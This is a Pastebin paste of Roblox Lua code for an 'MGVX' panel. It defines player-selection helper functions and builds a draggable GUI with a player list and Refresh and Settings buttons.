Advertisement
jech

Untitled

Jun 16th, 2016
130
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 77.75 KB | None | 0 0
  1. local CoreValues = Instance.new("Folder")
  2. CoreValues.Name = "MGVXCore"
  3. CoreValues.Parent = game
  4.  
  5.  
  6. local Http = game:GetService("HttpService")
  7. local gWorkspace = game:GetService("Workspace")
  8. local OwnerGui = game:GetService("Players").LocalPlayer.PlayerGui
  9.  
  10.  
  11. -- Makes Sure EveryThing Goes Ok!---
  12. print("MGVX LOADED")
  13.  
  14.  
  15. --------
  16. local WhiteList = {}
  17. local BlackListed = {}
  18. -- Variables---
  19.  
  20.  
  21. Owner = game.Players.LocalPlayer
  22. local plr = Owner
  23. for i,v in pairs(game.Players:GetChildren())do if v.Name ~= plr then otherp = v end end
  24.  
  25.  
  26. ------------Functions----------
  27. function GetPlr(plr, str)
  28. local plrz = {} str = str:lower()
  29. if str == "all" then plrz = game.Players:children()
  30. elseif str == "others" then for i, v in pairs(game.Players:children()) do if v ~= plr then table.insert(plrz, v) end end
  31. else
  32. local sn = {1} local en = {}
  33. for i = 1, #str do if str:sub(i,i) == "," then table.insert(sn, i+1) table.insert(en,i-1) end end
  34. for x = 1, #sn do
  35. if (sn[x] and en[x] and str:sub(sn[x],en[x]) == "me") or (sn[x] and str:sub(sn[x]) == "me") then table.insert(plrz, plr)
  36. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "random") or (sn[x] and str:sub(sn[x]) == "random") then table.insert(plrz, game.Players:children()[math.random(#game.Players:children())])
  37. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]):sub(1,4) == "team") then
  38. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x],en[x]):sub(6)) == 1 then
  39. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  40. end end end
  41. elseif (sn[x] and str:sub(sn[x]):sub(1,4):lower() == "team") then
  42. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x]):sub(6)) == 1 then
  43. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  44. end end end
  45. else
  46. for a, plyr in pairs(game.Players:children()) do
  47. if (sn[x] and en[x] and str:sub(sn[x],en[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x],en[x])) == 1) or (sn[x] and str:sub(sn[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x])) == 1) or (str ~= "" and plyr.Name:lower():find(str) == 1) then
  48. table.insert(plrz, plyr) break
  49. end
  50. end
  51. end
  52. end
  53. end
  54. return plrz
  55. end
  56.  
  57. function findPlayer(name)
  58. for _, player in ipairs(game.Players:GetPlayers()) do
  59. if player.Name:lower() == name:lower() then
  60. return player
  61. end
  62. end
  63. end
  64. function WriteTxt(obj,message)
  65. local q = obj.Text
  66. obj.Text = q..""..message..""
  67.  
  68. end
  69.  
  70. local OwnerV = Instance.new("StringValue")
  71. OwnerV.Name = "Owner"
  72. OwnerV.Value = Owner.Name
  73. OwnerV.Parent = CoreValues
  74.  
  75. local OtherP = Instance.new("StringValue")
  76. OtherP.Name = "OtherP"
  77. OtherP.Value = otherp.Name
  78. OtherP.Parent = CoreValues
  79.  
  80. local NewGuiPart1 = Instance.new("ScreenGui")
  81. NewGuiPart1.Name = "MGVX"
  82. NewGuiPart1.Parent = Owner.PlayerGui
  83.  
  84.  
  85.  
  86. -------
  87. local NewGuiPart2 = Instance.new("Frame")
  88. NewGuiPart2.Active = true
  89. NewGuiPart2.Position = UDim2.new(0.368000001, 0, 0.0829999968, 0)
  90. NewGuiPart2.Size = UDim2.new(0, 300, 0, 350)
  91. NewGuiPart2.Style = Enum.FrameStyle.DropShadow
  92. NewGuiPart2.ClipsDescendants = true
  93. NewGuiPart2.Draggable = true
  94. NewGuiPart2.Parent = NewGuiPart1
  95. -------
  96. local NewGuiPart3 = Instance.new("TextButton")
  97. NewGuiPart3.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  98. NewGuiPart3.BackgroundTransparency = 0.69999998807907
  99. NewGuiPart3.BorderColor3 = Color3.new(0, 0, 0)
  100. NewGuiPart3.BorderSizePixel = 0
  101. NewGuiPart3.Name = "TL1"
  102. NewGuiPart3.Position = UDim2.new(0, 200, 0, 0)
  103. NewGuiPart3.Selectable = true
  104. NewGuiPart3.Size = UDim2.new(0, 80, 0, 20)
  105. NewGuiPart3.Style = Enum.ButtonStyle.Custom
  106. NewGuiPart3.FontSize = Enum.FontSize.Size14
  107. NewGuiPart3.Text = "Refresh"
  108. NewGuiPart3.TextColor3 = Color3.new(1, 1, 1)
  109. NewGuiPart3.Parent = NewGuiPart2
  110. -------
  111. local NewGuiPart4 = Instance.new("TextLabel")
  112. NewGuiPart4.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  113. NewGuiPart4.BackgroundTransparency = 1
  114. NewGuiPart4.BorderColor3 = Color3.new(0, 0, 0)
  115. NewGuiPart4.BorderSizePixel = 0
  116. NewGuiPart4.Name = "TL2"
  117. NewGuiPart4.Position = UDim2.new(0, 50, 0, 0)
  118. NewGuiPart4.Size = UDim2.new(0, 80, 0, 20)
  119. NewGuiPart4.FontSize = Enum.FontSize.Size14
  120. NewGuiPart4.Text = "Loading..."
  121. NewGuiPart4.TextColor3 = Color3.new(1, 1, 1)
  122. NewGuiPart4.TextScaled = true
  123. NewGuiPart4.TextWrapped = true
  124. NewGuiPart4.Parent = NewGuiPart2
  125. -------
  126. local NewGuiPart5 = Instance.new("Frame")
  127. NewGuiPart5.BackgroundColor3 = Color3.new(0, 0, 0)
  128. NewGuiPart5.BackgroundTransparency = 1
  129. NewGuiPart5.BorderSizePixel = 5
  130. NewGuiPart5.Name = "Main"
  131. NewGuiPart5.Position = UDim2.new(1, -280, 0.0829999968, 0)
  132. NewGuiPart5.Size = UDim2.new(0, 250, 0, 300)
  133. NewGuiPart5.Visible = false
  134. NewGuiPart5.Draggable = true
  135. NewGuiPart5.Parent = NewGuiPart2
  136. -------
  137. local NewGuiPart6 = Instance.new("ScrollingFrame")
  138. NewGuiPart6.BackgroundTransparency = 1
  139. NewGuiPart6.Name = "PlayerList"
  140. NewGuiPart6.Position = UDim2.new(0, -7, 0, -10)
  141. NewGuiPart6.Selectable = true
  142. NewGuiPart6.Size = UDim2.new(0, 290, 0, 320)
  143. NewGuiPart6.ClipsDescendants = true
  144. NewGuiPart6.Parent = NewGuiPart5
  145. -------
  146. local NewGuiPart7 = Instance.new("Frame")
  147. NewGuiPart7.BackgroundColor3 = Color3.new(0, 0, 0)
  148. NewGuiPart7.BackgroundTransparency = 1
  149. NewGuiPart7.BorderSizePixel = 0
  150. NewGuiPart7.Size = UDim2.new(0, 290, 0, 35)
  151. NewGuiPart7.Parent = NewGuiPart6
  152. -------
  153. local NewGuiPart8 = Instance.new("ImageLabel")
  154. NewGuiPart8.Active = false
  155. NewGuiPart8.BackgroundTransparency = 1
  156. NewGuiPart8.BorderSizePixel = 0
  157. NewGuiPart8.Position = UDim2.new(0, 10, 0, 15)
  158. NewGuiPart8.Selectable = false
  159. NewGuiPart8.Size = UDim2.new(0, 65, 0, 25)
  160. NewGuiPart8.Image = "http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username=ROBLOX"
  161. NewGuiPart8.Parent = NewGuiPart7
  162. -------
  163. local NewGuiPart9 = Instance.new("TextLabel")
  164. NewGuiPart9.BackgroundTransparency = 1
  165. NewGuiPart9.BorderSizePixel = 0
  166. NewGuiPart9.Position = UDim2.new(0, 100, 0, 15)
  167. NewGuiPart9.Size = UDim2.new(0, 100, 0, 25)
  168. NewGuiPart9.Font = Enum.Font.Legacy
  169. NewGuiPart9.FontSize = Enum.FontSize.Size10
  170. NewGuiPart9.Text = ""
  171. NewGuiPart9.TextColor3 = Color3.new(1, 1, 1)
  172. NewGuiPart9.TextScaled = true
  173. NewGuiPart9.TextWrapped = true
  174. NewGuiPart9.Parent = NewGuiPart7
  175. -------
  176. local NewGuiPart10 = Instance.new("Frame")
  177. NewGuiPart10.BackgroundColor3 = Color3.new(0, 0, 0)
  178. NewGuiPart10.BackgroundTransparency = 1
  179. NewGuiPart10.BorderSizePixel = 0
  180. NewGuiPart10.Position = UDim2.new(0, 0, 0, 35)
  181. NewGuiPart10.Size = UDim2.new(0, 290, 0, 35)
  182. NewGuiPart10.Parent = NewGuiPart6
  183. -------
  184. local NewGuiPart11 = Instance.new("ImageLabel")
  185. NewGuiPart11.Active = false
  186. NewGuiPart11.BackgroundTransparency = 1
  187. NewGuiPart11.BorderSizePixel = 0
  188. NewGuiPart11.Position = UDim2.new(0, 10, 0, 15)
  189. NewGuiPart11.Selectable = false
  190. NewGuiPart11.Size = UDim2.new(0, 65, 0, 25)
  191. NewGuiPart11.Image = ""
  192. NewGuiPart11.Parent = NewGuiPart10
  193. -------
  194. local NewGuiPart12 = Instance.new("TextLabel")
  195. NewGuiPart12.BackgroundTransparency = 1
  196. NewGuiPart12.BorderSizePixel = 0
  197. NewGuiPart12.Position = UDim2.new(0, 100, 0, 15)
  198. NewGuiPart12.Size = UDim2.new(0, 100, 0, 25)
  199. NewGuiPart12.Font = Enum.Font.Legacy
  200. NewGuiPart12.FontSize = Enum.FontSize.Size10
  201. NewGuiPart12.Text = ""
  202. NewGuiPart12.TextColor3 = Color3.new(1, 1, 1)
  203. NewGuiPart12.TextScaled = true
  204. NewGuiPart12.TextWrapped = true
  205. NewGuiPart12.Parent = NewGuiPart10
  206. -------
  207. local NewGuiPart13 = Instance.new("Frame")
  208. NewGuiPart13.BackgroundColor3 = Color3.new(0, 0, 0)
  209. NewGuiPart13.BackgroundTransparency = 1
  210. NewGuiPart13.BorderSizePixel = 0
  211. NewGuiPart13.Position = UDim2.new(0, 0, 0, 70)
  212. NewGuiPart13.Size = UDim2.new(0, 290, 0, 35)
  213. NewGuiPart13.Parent = NewGuiPart6
  214. -------
  215. local NewGuiPart14 = Instance.new("ImageLabel")
  216. NewGuiPart14.Active = false
  217. NewGuiPart14.BackgroundTransparency = 1
  218. NewGuiPart14.BorderSizePixel = 0
  219. NewGuiPart14.Position = UDim2.new(0, 10, 0, 15)
  220. NewGuiPart14.Selectable = false
  221. NewGuiPart14.Size = UDim2.new(0, 65, 0, 25)
  222. NewGuiPart14.Image = ""
  223. NewGuiPart14.Image = ""
  224. NewGuiPart14.Parent = NewGuiPart13
  225. -------
  226. local NewGuiPart15 = Instance.new("TextLabel")
  227. NewGuiPart15.BackgroundTransparency = 1
  228. NewGuiPart15.BorderSizePixel = 0
  229. NewGuiPart15.Position = UDim2.new(0, 100, 0, 15)
  230. NewGuiPart15.Size = UDim2.new(0, 100, 0, 25)
  231. NewGuiPart15.Font = Enum.Font.Legacy
  232. NewGuiPart15.FontSize = Enum.FontSize.Size10
  233. NewGuiPart15.Text = ""
  234. NewGuiPart15.TextColor3 = Color3.new(1, 1, 1)
  235. NewGuiPart15.TextScaled = true
  236. NewGuiPart15.TextWrapped = true
  237. NewGuiPart15.Parent = NewGuiPart13
  238. -------
  239. local NewGuiPart16 = Instance.new("Frame")
  240. NewGuiPart16.BackgroundColor3 = Color3.new(0, 0, 0)
  241. NewGuiPart16.BackgroundTransparency = 1
  242. NewGuiPart16.BorderSizePixel = 0
  243. NewGuiPart16.Position = UDim2.new(0, 0, 0, 105)
  244. NewGuiPart16.Size = UDim2.new(0, 290, 0, 35)
  245. NewGuiPart16.Parent = NewGuiPart6
  246. -------
  247. local NewGuiPart17 = Instance.new("ImageLabel")
  248. NewGuiPart17.Active = false
  249. NewGuiPart17.BackgroundTransparency = 1
  250. NewGuiPart17.BorderSizePixel = 0
  251. NewGuiPart17.Position = UDim2.new(0, 10, 0, 15)
  252. NewGuiPart17.Selectable = false
  253. NewGuiPart17.Size = UDim2.new(0, 65, 0, 25)
  254. NewGuiPart17.Image = ""
  255. NewGuiPart17.Image = ""
  256. NewGuiPart17.Parent = NewGuiPart16
  257. -------
  258. local NewGuiPart18 = Instance.new("TextLabel")
  259. NewGuiPart18.BackgroundTransparency = 1
  260. NewGuiPart18.BorderSizePixel = 0
  261. NewGuiPart18.Position = UDim2.new(0, 100, 0, 15)
  262. NewGuiPart18.Size = UDim2.new(0, 100, 0, 25)
  263. NewGuiPart18.Font = Enum.Font.Legacy
  264. NewGuiPart18.FontSize = Enum.FontSize.Size10
  265. NewGuiPart18.Text = ""
  266. NewGuiPart18.TextColor3 = Color3.new(1, 1, 1)
  267. NewGuiPart18.TextScaled = true
  268. NewGuiPart18.TextWrapped = true
  269. NewGuiPart18.Parent = NewGuiPart16
  270. -------
  271. local NewGuiPart19 = Instance.new("Frame")
  272. NewGuiPart19.BackgroundColor3 = Color3.new(0, 0, 0)
  273. NewGuiPart19.BackgroundTransparency = 1
  274. NewGuiPart19.BorderSizePixel = 0
  275. NewGuiPart19.Position = UDim2.new(0, 0, 0, 140)
  276. NewGuiPart19.Size = UDim2.new(0, 290, 0, 35)
  277. NewGuiPart19.Parent = NewGuiPart6
  278. -------
  279. local NewGuiPart20 = Instance.new("ImageLabel")
  280. NewGuiPart20.Active = false
  281. NewGuiPart20.BackgroundTransparency = 1
  282. NewGuiPart20.BorderSizePixel = 0
  283. NewGuiPart20.Position = UDim2.new(0, 10, 0, 15)
  284. NewGuiPart20.Selectable = false
  285. NewGuiPart20.Size = UDim2.new(0, 65, 0, 25)
  286. NewGuiPart20.Image = ""
  287. NewGuiPart20.Image = ""
  288. NewGuiPart20.Parent = NewGuiPart19
  289. -------
  290. local NewGuiPart21 = Instance.new("TextLabel")
  291. NewGuiPart21.BackgroundTransparency = 1
  292. NewGuiPart21.BorderSizePixel = 0
  293. NewGuiPart21.Position = UDim2.new(0, 100, 0, 15)
  294. NewGuiPart21.Size = UDim2.new(0, 100, 0, 25)
  295. NewGuiPart21.Font = Enum.Font.Legacy
  296. NewGuiPart21.FontSize = Enum.FontSize.Size10
  297. NewGuiPart21.Text = ""
  298. NewGuiPart21.TextColor3 = Color3.new(1, 1, 1)
  299. NewGuiPart21.TextScaled = true
  300. NewGuiPart21.TextWrapped = true
  301. NewGuiPart21.Parent = NewGuiPart19
  302. -------
  303. local NewGuiPart22 = Instance.new("Frame")
  304. NewGuiPart22.BackgroundColor3 = Color3.new(0, 0, 0)
  305. NewGuiPart22.BackgroundTransparency = 1
  306. NewGuiPart22.BorderSizePixel = 0
  307. NewGuiPart22.Position = UDim2.new(0, 0, 0, 175)
  308. NewGuiPart22.Size = UDim2.new(0, 290, 0, 35)
  309. NewGuiPart22.Parent = NewGuiPart6
  310. -------
  311. local NewGuiPart23 = Instance.new("ImageLabel")
  312. NewGuiPart23.Active = false
  313. NewGuiPart23.BackgroundTransparency = 1
  314. NewGuiPart23.BorderSizePixel = 0
  315. NewGuiPart23.Position = UDim2.new(0, 10, 0, 15)
  316. NewGuiPart23.Selectable = false
  317. NewGuiPart23.Size = UDim2.new(0, 65, 0, 25)
  318. NewGuiPart23.Image = ""
  319. NewGuiPart23.Image = ""
  320. NewGuiPart23.Parent = NewGuiPart22
  321. -------
  322. local NewGuiPart24 = Instance.new("TextLabel")
  323. NewGuiPart24.BackgroundTransparency = 1
  324. NewGuiPart24.BorderSizePixel = 0
  325. NewGuiPart24.Position = UDim2.new(0, 100, 0, 15)
  326. NewGuiPart24.Size = UDim2.new(0, 100, 0, 25)
  327. NewGuiPart24.Font = Enum.Font.Legacy
  328. NewGuiPart24.FontSize = Enum.FontSize.Size10
  329. NewGuiPart24.Text = ""
  330. NewGuiPart24.TextColor3 = Color3.new(1, 1, 1)
  331. NewGuiPart24.TextScaled = true
  332. NewGuiPart24.TextWrapped = true
  333. NewGuiPart24.Parent = NewGuiPart22
  334. -------
  335. local NewGuiPart25 = Instance.new("Frame")
  336. NewGuiPart25.BackgroundColor3 = Color3.new(0, 0, 0)
  337. NewGuiPart25.BackgroundTransparency = 1
  338. NewGuiPart25.BorderSizePixel = 0
  339. NewGuiPart25.Position = UDim2.new(0, 0, 0, 205)
  340. NewGuiPart25.Size = UDim2.new(0, 290, 0, 35)
  341. NewGuiPart25.Parent = NewGuiPart6
  342. -------
  343. local NewGuiPart26 = Instance.new("ImageLabel")
  344. NewGuiPart26.Active = false
  345. NewGuiPart26.BackgroundTransparency = 1
  346. NewGuiPart26.BorderSizePixel = 0
  347. NewGuiPart26.Position = UDim2.new(0, 10, 0, 15)
  348. NewGuiPart26.Selectable = false
  349. NewGuiPart26.Size = UDim2.new(0, 65, 0, 25)
  350. NewGuiPart26.Image = ""
  351. NewGuiPart26.Image = ""
  352. NewGuiPart26.Parent = NewGuiPart25
  353. -------
  354. local NewGuiPart27 = Instance.new("TextLabel")
  355. NewGuiPart27.BackgroundTransparency = 1
  356. NewGuiPart27.BorderSizePixel = 0
  357. NewGuiPart27.Position = UDim2.new(0, 100, 0, 15)
  358. NewGuiPart27.Size = UDim2.new(0, 100, 0, 25)
  359. NewGuiPart27.Font = Enum.Font.Legacy
  360. NewGuiPart27.FontSize = Enum.FontSize.Size10
  361. NewGuiPart27.Text = ""
  362. NewGuiPart27.TextColor3 = Color3.new(1, 1, 1)
  363. NewGuiPart27.TextScaled = true
  364. NewGuiPart27.TextWrapped = true
  365. NewGuiPart27.Parent = NewGuiPart25
  366. -------
  367. local NewGuiPart28 = Instance.new("Frame")
  368. NewGuiPart28.BackgroundColor3 = Color3.new(0, 0, 0)
  369. NewGuiPart28.BackgroundTransparency = 1
  370. NewGuiPart28.BorderSizePixel = 0
  371. NewGuiPart28.Position = UDim2.new(0, 0, 0, 240)
  372. NewGuiPart28.Size = UDim2.new(0, 290, 0, 35)
  373. NewGuiPart28.Parent = NewGuiPart6
  374. -------
  375. local NewGuiPart29 = Instance.new("ImageLabel")
  376. NewGuiPart29.Active = false
  377. NewGuiPart29.BackgroundTransparency = 1
  378. NewGuiPart29.BorderSizePixel = 0
  379. NewGuiPart29.Position = UDim2.new(0, 10, 0, 15)
  380. NewGuiPart29.Selectable = false
  381. NewGuiPart29.Size = UDim2.new(0, 65, 0, 25)
  382. NewGuiPart29.Image = ""
  383. NewGuiPart29.Image = ""
  384. NewGuiPart29.Parent = NewGuiPart28
  385. -------
  386. local NewGuiPart30 = Instance.new("TextLabel")
  387. NewGuiPart30.BackgroundTransparency = 1
  388. NewGuiPart30.BorderSizePixel = 0
  389. NewGuiPart30.Position = UDim2.new(0, 100, 0, 15)
  390. NewGuiPart30.Size = UDim2.new(0, 100, 0, 25)
  391. NewGuiPart30.Font = Enum.Font.Legacy
  392. NewGuiPart30.FontSize = Enum.FontSize.Size10
  393. NewGuiPart30.Text = ""
  394. NewGuiPart30.TextColor3 = Color3.new(1, 1, 1)
  395. NewGuiPart30.TextScaled = true
  396. NewGuiPart30.TextWrapped = true
  397. NewGuiPart30.Parent = NewGuiPart28
  398. -------
  399. local NewGuiPart31 = Instance.new("Frame")
  400. NewGuiPart31.BackgroundColor3 = Color3.new(0, 0, 0)
  401. NewGuiPart31.BackgroundTransparency = 1
  402. NewGuiPart31.BorderSizePixel = 0
  403. NewGuiPart31.Position = UDim2.new(0, 0, 0, 275)
  404. NewGuiPart31.Size = UDim2.new(0, 290, 0, 35)
  405. NewGuiPart31.Parent = NewGuiPart6
  406. -------
  407. local NewGuiPart32 = Instance.new("ImageLabel")
  408. NewGuiPart32.Active = false
  409. NewGuiPart32.BackgroundTransparency = 1
  410. NewGuiPart32.BorderSizePixel = 0
  411. NewGuiPart32.Position = UDim2.new(0, 10, 0, 15)
  412. NewGuiPart32.Selectable = false
  413. NewGuiPart32.Size = UDim2.new(0, 65, 0, 25)
  414. NewGuiPart32.Image = ""
  415. NewGuiPart32.Image = ""
  416. NewGuiPart32.Parent = NewGuiPart31
  417. -------
  418. local NewGuiPart33 = Instance.new("TextLabel")
  419. NewGuiPart33.BackgroundTransparency = 1
  420. NewGuiPart33.BorderSizePixel = 0
  421. NewGuiPart33.Position = UDim2.new(0, 100, 0, 15)
  422. NewGuiPart33.Size = UDim2.new(0, 100, 0, 25)
  423. NewGuiPart33.Font = Enum.Font.Legacy
  424. NewGuiPart33.FontSize = Enum.FontSize.Size10
  425. NewGuiPart33.Text = ""
  426. NewGuiPart33.TextColor3 = Color3.new(1, 1, 1)
  427. NewGuiPart33.TextScaled = true
  428. NewGuiPart33.TextWrapped = true
  429. NewGuiPart33.Parent = NewGuiPart31
  430. -------
  431. local NewGuiPart34 = Instance.new("Frame")
  432. NewGuiPart34.BackgroundColor3 = Color3.new(0, 0, 0)
  433. NewGuiPart34.BackgroundTransparency = 1
  434. NewGuiPart34.BorderSizePixel = 0
  435. NewGuiPart34.Position = UDim2.new(0, 0, 0, 305)
  436. NewGuiPart34.Size = UDim2.new(0, 290, 0, 35)
  437. NewGuiPart34.Parent = NewGuiPart6
  438. -------
  439. local NewGuiPart35 = Instance.new("ImageLabel")
  440. NewGuiPart35.Active = false
  441. NewGuiPart35.BackgroundTransparency = 1
  442. NewGuiPart35.BorderSizePixel = 0
  443. NewGuiPart35.Position = UDim2.new(0, 10, 0, 15)
  444. NewGuiPart35.Selectable = false
  445. NewGuiPart35.Size = UDim2.new(0, 65, 0, 25)
  446. NewGuiPart35.Image = ""
  447. NewGuiPart35.Image = ""
  448. NewGuiPart35.Parent = NewGuiPart34
  449. -------
  450. local NewGuiPart36 = Instance.new("TextLabel")
  451. NewGuiPart36.BackgroundTransparency = 1
  452. NewGuiPart36.BorderSizePixel = 0
  453. NewGuiPart36.Position = UDim2.new(0, 100, 0, 15)
  454. NewGuiPart36.Size = UDim2.new(0, 100, 0, 25)
  455. NewGuiPart36.Font = Enum.Font.Legacy
  456. NewGuiPart36.FontSize = Enum.FontSize.Size10
  457. NewGuiPart36.Text = ""
  458. NewGuiPart36.TextColor3 = Color3.new(1, 1, 1)
  459. NewGuiPart36.TextScaled = true
  460. NewGuiPart36.TextWrapped = true
  461. NewGuiPart36.Parent = NewGuiPart34
  462. -------
  463. local NewGuiPart37 = Instance.new("Frame")
  464. NewGuiPart37.BackgroundColor3 = Color3.new(0, 0, 0)
  465. NewGuiPart37.BackgroundTransparency = 1
  466. NewGuiPart37.BorderSizePixel = 0
  467. NewGuiPart37.Position = UDim2.new(0, 0, 0, 345)
  468. NewGuiPart37.Size = UDim2.new(0, 290, 0, 35)
  469. NewGuiPart37.Parent = NewGuiPart6
  470. -------
  471. local NewGuiPart38 = Instance.new("ImageLabel")
  472. NewGuiPart38.Active = false
  473. NewGuiPart38.BackgroundTransparency = 1
  474. NewGuiPart38.BorderSizePixel = 0
  475. NewGuiPart38.Position = UDim2.new(0, 10, 0, 15)
  476. NewGuiPart38.Selectable = false
  477. NewGuiPart38.Size = UDim2.new(0, 65, 0, 25)
  478. NewGuiPart38.Image = ""
  479. NewGuiPart38.Image = ""
  480. NewGuiPart38.Parent = NewGuiPart37
  481. -------
  482. local NewGuiPart39 = Instance.new("TextLabel")
  483. NewGuiPart39.BackgroundTransparency = 1
  484. NewGuiPart39.BorderSizePixel = 0
  485. NewGuiPart39.Position = UDim2.new(0, 100, 0, 15)
  486. NewGuiPart39.Size = UDim2.new(0, 100, 0, 25)
  487. NewGuiPart39.Font = Enum.Font.Legacy
  488. NewGuiPart39.FontSize = Enum.FontSize.Size10
  489. NewGuiPart39.Text = ""
  490. NewGuiPart39.TextColor3 = Color3.new(1, 1, 1)
  491. NewGuiPart39.TextScaled = true
  492. NewGuiPart39.TextWrapped = true
  493. NewGuiPart39.Parent = NewGuiPart37
  494. -------
  495. local NewGuiPart40 = Instance.new("Frame")
  496. NewGuiPart40.BackgroundColor3 = Color3.new(0, 0, 0)
  497. NewGuiPart40.BackgroundTransparency = 1
  498. NewGuiPart40.BorderSizePixel = 0
  499. NewGuiPart40.Position = UDim2.new(0, 0, 0, 375)
  500. NewGuiPart40.Size = UDim2.new(0, 290, 0, 35)
  501. NewGuiPart40.Parent = NewGuiPart6
  502. -------
  503. local NewGuiPart41 = Instance.new("ImageLabel")
  504. NewGuiPart41.Active = false
  505. NewGuiPart41.BackgroundTransparency = 1
  506. NewGuiPart41.BorderSizePixel = 0
  507. NewGuiPart41.Position = UDim2.new(0, 10, 0, 15)
  508. NewGuiPart41.Selectable = false
  509. NewGuiPart41.Size = UDim2.new(0, 65, 0, 25)
  510. NewGuiPart41.Image = ""
  511. NewGuiPart41.Image = ""
  512. NewGuiPart41.Parent = NewGuiPart40
  513. -------
  514. local NewGuiPart42 = Instance.new("TextLabel")
  515. NewGuiPart42.BackgroundTransparency = 1
  516. NewGuiPart42.BorderSizePixel = 0
  517. NewGuiPart42.Position = UDim2.new(0, 100, 0, 15)
  518. NewGuiPart42.Size = UDim2.new(0, 100, 0, 25)
  519. NewGuiPart42.Font = Enum.Font.Legacy
  520. NewGuiPart42.FontSize = Enum.FontSize.Size10
  521. NewGuiPart42.Text = ""
  522. NewGuiPart42.TextColor3 = Color3.new(1, 1, 1)
  523. NewGuiPart42.TextScaled = true
  524. NewGuiPart42.TextWrapped = true
  525. NewGuiPart42.Parent = NewGuiPart40
  526. -------
  527. local NewGuiPart43 = Instance.new("Frame")
  528. NewGuiPart43.BackgroundColor3 = Color3.new(0, 0, 0)
  529. NewGuiPart43.BackgroundTransparency = 1
  530. NewGuiPart43.BorderSizePixel = 0
  531. NewGuiPart43.Position = UDim2.new(0, 0, 0, 405)
  532. NewGuiPart43.Size = UDim2.new(0, 290, 0, 35)
  533. NewGuiPart43.Parent = NewGuiPart6
  534. -------
  535. local NewGuiPart44 = Instance.new("ImageLabel")
  536. NewGuiPart44.Active = false
  537. NewGuiPart44.BackgroundTransparency = 1
  538. NewGuiPart44.BorderSizePixel = 0
  539. NewGuiPart44.Position = UDim2.new(0, 10, 0, 15)
  540. NewGuiPart44.Selectable = false
  541. NewGuiPart44.Size = UDim2.new(0, 65, 0, 25)
  542. NewGuiPart44.Image = ""
  543. NewGuiPart44.Image = ""
  544. NewGuiPart44.Parent = NewGuiPart43
  545. -------
  546. local NewGuiPart45 = Instance.new("TextLabel")
  547. NewGuiPart45.BackgroundTransparency = 1
  548. NewGuiPart45.BorderSizePixel = 0
  549. NewGuiPart45.Position = UDim2.new(0, 100, 0, 15)
  550. NewGuiPart45.Size = UDim2.new(0, 100, 0, 25)
  551. NewGuiPart45.Font = Enum.Font.Legacy
  552. NewGuiPart45.FontSize = Enum.FontSize.Size10
  553. NewGuiPart45.Text = ""
  554. NewGuiPart45.TextColor3 = Color3.new(1, 1, 1)
  555. NewGuiPart45.TextScaled = true
  556. NewGuiPart45.TextWrapped = true
  557. NewGuiPart45.Parent = NewGuiPart43
  558. -------
  559. local NewGuiPart46 = Instance.new("Frame")
  560. NewGuiPart46.BackgroundColor3 = Color3.new(0, 0, 0)
  561. NewGuiPart46.BackgroundTransparency = 1
  562. NewGuiPart46.BorderSizePixel = 0
  563. NewGuiPart46.Position = UDim2.new(0, 0, 0, 445)
  564. NewGuiPart46.Size = UDim2.new(0, 290, 0, 35)
  565. NewGuiPart46.Parent = NewGuiPart6
  566. -------
  567. local NewGuiPart47 = Instance.new("ImageLabel")
  568. NewGuiPart47.Active = false
  569. NewGuiPart47.BackgroundTransparency = 1
  570. NewGuiPart47.BorderSizePixel = 0
  571. NewGuiPart47.Position = UDim2.new(0, 10, 0, 15)
  572. NewGuiPart47.Selectable = false
  573. NewGuiPart47.Size = UDim2.new(0, 65, 0, 25)
  574. NewGuiPart47.Image = ""
  575. NewGuiPart47.Image = ""
  576. NewGuiPart47.Parent = NewGuiPart46
  577. -------
  578. local NewGuiPart48 = Instance.new("TextLabel")
  579. NewGuiPart48.BackgroundTransparency = 1
  580. NewGuiPart48.BorderSizePixel = 0
  581. NewGuiPart48.Position = UDim2.new(0, 100, 0, 15)
  582. NewGuiPart48.Size = UDim2.new(0, 100, 0, 25)
  583. NewGuiPart48.Font = Enum.Font.Legacy
  584. NewGuiPart48.FontSize = Enum.FontSize.Size10
  585. NewGuiPart48.Text = ""
  586. NewGuiPart48.TextColor3 = Color3.new(1, 1, 1)
  587. NewGuiPart48.TextScaled = true
  588. NewGuiPart48.TextWrapped = true
  589. NewGuiPart48.Parent = NewGuiPart46
  590. -------
  591. local NewGuiPart49 = Instance.new("TextButton")
  592. NewGuiPart49.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  593. NewGuiPart49.BackgroundTransparency = 0.69999998807907
  594. NewGuiPart49.BorderColor3 = Color3.new(0, 0, 0)
  595. NewGuiPart49.BorderSizePixel = 0
  596. NewGuiPart49.Name = "TL3"
  597. NewGuiPart49.Position = UDim2.new(0, 200, 0, 25)
  598. NewGuiPart49.Selectable = true
  599. NewGuiPart49.Size = UDim2.new(0, 80, 0, 20)
  600. NewGuiPart49.Style = Enum.ButtonStyle.Custom
  601. NewGuiPart49.FontSize = Enum.FontSize.Size14
  602. NewGuiPart49.Text = "Settings"
  603. NewGuiPart49.TextColor3 = Color3.new(1, 1, 1)
  604. NewGuiPart49.Parent = NewGuiPart2
  605. -------
  606. local NewGuiPart50 = Instance.new("Frame")
  607. NewGuiPart50.BackgroundTransparency = 1
  608. NewGuiPart50.Name = "ScrollingFrame"
  609. NewGuiPart50.Position = UDim2.new(0, 0, 0, 50)
  610. NewGuiPart50.Size = UDim2.new(0, 290, 0, 280)
  611. NewGuiPart50.Visible = false
  612. NewGuiPart50.ClipsDescendants = true
  613. NewGuiPart50.Draggable = true
  614. NewGuiPart50.Parent = NewGuiPart2
  615.  
  616. -------
